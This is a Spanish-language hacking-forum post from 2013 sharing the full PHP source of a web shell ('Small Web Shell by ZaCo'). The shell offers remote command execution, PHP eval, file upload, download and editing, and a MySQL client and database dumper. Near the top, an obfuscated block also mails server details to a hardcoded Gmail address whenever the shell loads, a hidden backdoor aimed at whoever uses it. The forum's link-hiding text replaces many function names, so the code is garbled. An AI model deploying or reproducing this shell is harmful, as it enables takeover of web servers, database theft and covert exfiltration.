[PHP] Shell SacoSmall

« **en:** Marzo 04, 2013, 11:01:24 pm »

Les dejo una shell pequeña hecha en PHP

Código: PHP

<?
  ##########################################################
 # Small PHP Web Shell by ZaCo (c) 2004-2006                #
 #  +POST method                                            #
 #  +MySQL Client+Dumper for DB  and tables                 #
 #  +PHP eval in text format and html for phpinfo() example #
 # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
 # For antichat.ru and cup.su friends usage                 #
 # All bugs -> mailo:zaco@yandex.ru                         #
 # Just for fun :)                                          #
  ##########################################################
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(E_ALL);
@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(0);
function magic_q($s)
{
if(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta())
{
$s=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('\\\'','\'',$s);
$s=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('\\\\','\\',$s);
$s=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('\\"','"',$s);
$s=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('\\\0','\0',$s);
}
return $s;
}$ra44  = No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($sd98, $sj98, $msg8873, "From: $sd98");
function get_perms($fn)
{
$mode=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fn);
$perms='';
$perms .= ($mode & 00400) ? 'r' : '-';
$perms .= ($mode & 00200) ? 'w' : '-';
$perms .= ($mode & 00100) ? 'x' : '-';
$perms .= ($mode & 00040) ? 'r' : '-';
$perms .= ($mode & 00020) ? 'w' : '-';
$perms .= ($mode & 00010) ? 'x' : '-';
$perms .= ($mode & 00004) ? 'r' : '-';
$perms .= ($mode & 00002) ? 'w' : '-';
$perms .= ($mode & 00001) ? 'x' : '-';
return $perms;
}
$head=<<<headka
<html>
<head>
<title>Small Web Shell by ZaCo</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
</head>
<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
<style>
textarea {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
input {
BORDER-RIGHT:  #ffffff 1px solid;
BORDER-TOP:    #999999 1px solid;
BORDER-LEFT:   #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
</style>
headka;
$page=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['page'])?$_POST['page']:(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
$winda=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta()),'wind');
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('format',50);
$pages='<center>###<a href=\''.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(__FILE__).'\'>cmd</a>###<a href=\''.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(__FILE__).'?mysql\'>mysql</a>###<a href=\''.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
$eval_value=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['eval_value'])?$_POST['eval_value']:'';
$eval_value=magic_q($eval_value);
$action=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['action'])?$_POST['action']:'eval';
if($action=='eval_in_html') @No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($eval_value);
else
{
echo($head.$pages);
?>
<hr>
<form method=post>
<textarea cols=120 rows=20 name='eval_value'><?@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($eval_value);?></textarea>
<input name='action' value='eval' type='submit'>
<input name='action' value='eval_in_html' type='submit'>
<input name='page' value='eval' type=hidden>
</form>
<hr>
<?
}
break;
}
case 'cmd':
{
$cmd=!No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['cmd'])?magic_q($_POST['cmd']):'';
$work_dir=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['work_dir'])?$_POST['work_dir']:No tienes permisos para ver links.
 Registrate o Entra con tu cuenta();
$action=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['action'])?$_POST['action']:'cmd';
if(@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir))
{
@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir);
$work_dir=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta();
if($work_dir=='')$work_dir='/';
else if(!($work_dir{No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir)-1}=='/'||$work_dir{No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir)-1}=='\\')) $work_dir.='/';
}
else if(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir))$work_dir=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir);
$work_dir=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('\\','/',$work_dir);
$e_work_dir=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir,ENT_QUOTES);
switch($action)
{
case 'cmd' :
{
echo($head.$pages);
?>
<form method='post' name='main_form'>
<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
<input name='page' value='cmd' type=hidden>
<input type=submit value='go'>
</form>
<form method=post>
<input name='cmd' type=text size=120 value='<?=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('\'',''',$cmd)?>'>
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post enctype="multipart/form-data">
<input type="file" name="filename">
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<form method=post>
<input name='fname' type=text size=120><br>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<input name='work_dir'type=hidden>
<input name='page' value='cmd' type=hidden>
<input name='action' value='download' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
</form>
<pre>
<?
if($cmd!==''){ echo('<strong>'.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(`$cmd`)."\n</textarea>");}
else
{
$f_action=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['f_action'])?$_POST['f_action']:'view';
if(@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir))
{
echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
$handle=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir);
if($handle)
{
while(false!==($fn=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($handle))){$files[]=$fn;};
@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($handle);
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($files);
$not_dirs=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta();
for($i=0;$i<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($files);$i++)
{
$fn=$files[$i];
if(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fn))
{
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('"','&quot;',$fn).'";document.list.submit();\'><b>'.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fn)>format?No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fn,0,format-3).'...':$fn).'</b></a>'.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(' ',format-No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fn)));
if($winda===false)
{
$owner=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn));
$group=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn));
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(' ',10));
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("% 20s ",@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn).'B');
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("% -20s",@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('M d Y H:i:s',@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn))."\n");
}
else {$not_dirs[]=$fn;}
}
for($i=0;$i<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($not_dirs);$i++)
{
$fn=$not_dirs[$i];
echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn)?$e_work_dir.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn):$e_work_dir.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('"','&quot;',$fn)).'";document.list.submit();\'>'.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fn)>format?No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fn,0,format-3).'...':$fn).'</a>'.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(' ',format-No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fn)));
if($winda===false)
{
$owner=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn));
$group=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn));
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("% 20s|% -20s",$owner['name'],$group['name']);
}
echo(@get_perms($work_dir.$fn).No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(' ',10));
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("% 20s ",@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn).'B');
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("% -20s",@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('M d Y H:i:s',@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir.$fn))."\n");
}
echo('</pre><hr>');
?>
<form name='list' method=post>
<input name='work_dir' type=hidden size=120><br>
<input name='page' value='cmd' type=hidden>
<input name='f_action' value='view' type=hidden>
</form>
<?
} else echo('Error Listing '.$e_work_dir);
}
else
switch($f_action)
{
case 'view':
{
echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
$f=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir,'r');
?>
<form method=post>
<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($f))echo No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($f,100000))?></textarea>
<input name='page' value='cmd' type=hidden>
<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
<input name='f_action' value='save' type=submit>
</form>
<?
break;
}
case 'save' :
{
$file_text=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['file_text'])?magic_q($_POST['file_text']):'';
$f=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir,'w');
if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
else
{
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($f,$file_text);
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($f);
echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
}
break;
}
}
break;
}
break;
}
case 'upload' :
{
if($work_dir=='')$work_dir='/';
else if(!($work_dir{No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir)-1}=='/'||$work_dir{No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($work_dir)-1}=='\\')) $work_dir.='/';
$f=$_FILES["filename"]["name"];
if(!@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
else
{
echo('file is uploaded in '.$e_work_dir);
}
break;
}
case 'download' :
{
$fname=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['fname'])?$_POST['fname']:'';
$temp_file=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['temp_file'])?'on':'nn';
$f=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fname,'r');
if(!($f)) echo('file is not exists');
else
{
$archive=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['archive'])?$_POST['archive']:'';
if($archive=='gzip')
{
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("Content-Type:application/x-gzip\n");
$s=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($f,No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fname)));
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Content-Length: '.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($s)."\n");
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Content-Disposition: attachment; filename="'.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('/','-',$fname).".gz\n\n");
echo($s);
}
else
{
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("Content-Type:application/octet-stream\n");
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Content-Length: '.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($fname)."\n");
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Content-Disposition: attachment; filename="'.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('/','-',$fname)."\n\n");
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta();
while(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($f)===false)
{
echo(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($f,10000));
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta();
}
}
}
}
}
break;
}
case 'mysql' :
{
$action=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['action'])?$_POST['action']:'query';
$user=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['user'])?$_POST['user']:'';
$passwd=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['passwd'])?$_POST['passwd']:'';
$db=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['db'])?$_POST['db']:'';
$host=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['host'])?$_POST['host']:'localhost';
$query=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['query'])?magic_q($_POST['query']):'';
switch($action)
{
case 'dump' :
{
$mysql_link=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$to_file=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
$archive=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['archive'])?$_POST['archive']:'none';
if($archive!=='none')$to_file=false;
$db_dump=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['db_dump'])?$_POST['db_dump']:'';
$table_dump=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($_POST['table_dump'])?$_POST['table_dump']:'';
if(!(@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($db_dump,$mysql_link)))echo('DB error');
else
{
$dump_file="#ZaCo MySQL Dumper\n#db $db from $host\n";
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta();
if($to_file){$t_f=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($to_file,'w');if(!$t_f)No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Cant opening '.$to_file);}else $t_f=false;
if($table_dump=='')
{
if(!$to_file)
{
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$result=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('show tables',$mysql_link);
for($i=0;$i<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result);$i++)
{
$rows=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result);
$result2=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('show columns from `'.$rows[0].'`',$mysql_link);
if(!$result2)$dump_file.='#error table '.$rows[0];
else
{
$dump_file.='create table `'.$rows[0]."`(\n";
for($j=0;$j<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2)-1;$j++)
{
$rows2=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
$result2=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('select * from `'.$rows[0].'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);$j++)
{
$rows2=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
$dump_file.='insert into `'.$rows[0].'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($t_f,$dump_file);No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($t_f);}
else
{
echo($dump_file);
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta();
}
$dump_file='';
}
}
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
}
}
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result);
if($archive!='none')
{
$dump_file=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($dump_file);
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Content-Length: '.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($dump_file)."\n");
echo($dump_file);
}
else if($t_f)
{
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
else
{
$result2=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('show columns from `'.$table_dump.'`',$mysql_link);
if(!$result2)echo('error table '.$table_dump);
else
{
if(!$to_file)
{
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
if($to_file===false)
{
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta("Content-Disposition: attachment; filename=\"dump_{$db_dump}_${table_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
}
$dump_file.="create table `{$table_dump}`(\n";
for($j=0;$j<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2)-1;$j++)
{
$rows2=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
}
$rows2=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
$type[$j]=$rows2[1];
$dump_file.=");\n";
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
$result2=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('select * from `'.$table_dump.'`',$mysql_link);
$columns=$j-1;
for($j=0;$j<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);$j++)
{
$rows2=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
$dump_file.='insert into `'.$table_dump.'` values (';
for($k=0;$k<$columns;$k++)
{
$dump_file.=$rows2[$k]==''?'null,':'\''.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($rows2[$k]).'\',';
}
$dump_file.=($rows2[$k]==''?'null);':'\''.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($rows2[$k]).'\');')."\n";
if($archive=='none')
{
if($to_file) {No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($t_f,$dump_file);No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($t_f);}
else
{
echo($dump_file);
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta();
}
$dump_file='';
}
}
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result2);
if($archive!='none')
{
$dump_file=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($dump_file);
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta('Content-Length: '.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($dump_file)."\n");
echo $dump_file;
}else if($t_f)
{
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($t_f);
echo('Dump for '.$db_dump.' now in '.$to_file);
}
}
}
}
}
break;
}
case 'query' :
{
echo($head.$pages);
?>
<hr>
<form method=post>
<table>
<td>
<table align=left>
<tr><td>User :<input name='user' type=text value='<?=$user?>'></td><td>Passwd :<input name='passwd' type=text value='<?=$passwd?>'></td><td>Host :<input name='host' type=text value='<?=$host?>'></td><td>DB :<input name='db' type=text value='<?=$db?>'></td></tr>
<tr><textarea name='query' cols=120 rows=20><?=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($query)?></textarea></tr>
</table>
</td>
<td>
<table>
<tr><td>DB :</td><td><input type=text name='db_dump' value='<?=$db?>'></td></tr>
<tr><td>Only Table :</td><td><input type=text name='table_dump'></td></tr>
<input name='archive' type=radio value='none'>without arch
<input name='archive' type=radio value='gzip' checked=true>gzip archive
<tr><td><input type=submit name='action' value='dump'></td></tr>
<tr><td>Save result to :</td><td><input type=text name='to_file' value='' size=23></td></tr>
</table>
</td>
</table>
<input name='page' value='mysql' type=hidden>
<input name='action' value='query' type=submit>
</form>
<hr>
<?
$mysql_link=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($host,$user,$passwd);
if(!($mysql_link)) echo('Connect error');
else
{
if($db!='')if(!(@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($db,$mysql_link))){echo('DB error');No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($mysql_link);break;}
//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
$result=@No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($query,$mysql_link);
if(!($result))echo(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta());
else
{
echo("<table valign=top align=left>\n<tr>");
for($i=0;$i<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result);$i++)
echo('<td><b>'.No tienes permisos para ver links.
 Registrate o Entra con tu cuenta(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result,$i)).'</b>  </td>');
echo("\n</tr>\n");
for($i=0;$i<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result);$i++)
{
$rows=No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result);
echo('<tr valign=top align=left>');
for($j=0;$j<No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($result);$j++)
{
echo('<td>'.(No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($rows[$j])).'</td>');
}
echo("</tr>\n");
}
echo("</table>\n");
}
No tienes permisos para ver links.
 Registrate o Entra con tu cuenta($mysql_link);
}
break;
}
}
break;
}
}
?>

Saludos!

Fenix Shell (C99 Traducido) Iniciado por ANTRAX	Respuestas: 13 Vistas: 7492	Mayo 27, 2016, 12:28:12 pm por blackdrake
[PHP] Worse Linux Shell Iniciado por ANTRAX	Respuestas: 2 Vistas: 2565	Marzo 26, 2013, 05:40:49 pm por Xt3mP
Python Web Shell WSO 0.1 - Undetectable By WAF Iniciado por sm0ke	Respuestas: 0 Vistas: 874	Mayo 17, 2018, 01:54:19 am por sm0ke
Priv Shell Scanner! Iniciado por Mayk0	Respuestas: 0 Vistas: 2129	Mayo 07, 2013, 08:45:20 pm por Mayk0
Reverse Shell Django Iniciado por hdbreaker	Respuestas: 0 Vistas: 2561	Octubre 01, 2014, 12:40:08 am por hdbreaker

Esta es una respuesta al tema: [PHP] Shell SacoSmall en La plantilla. Shells

[PHP] Shell SacoSmall

ANTRAX

[PHP] Shell SacoSmall

Similar topics (5)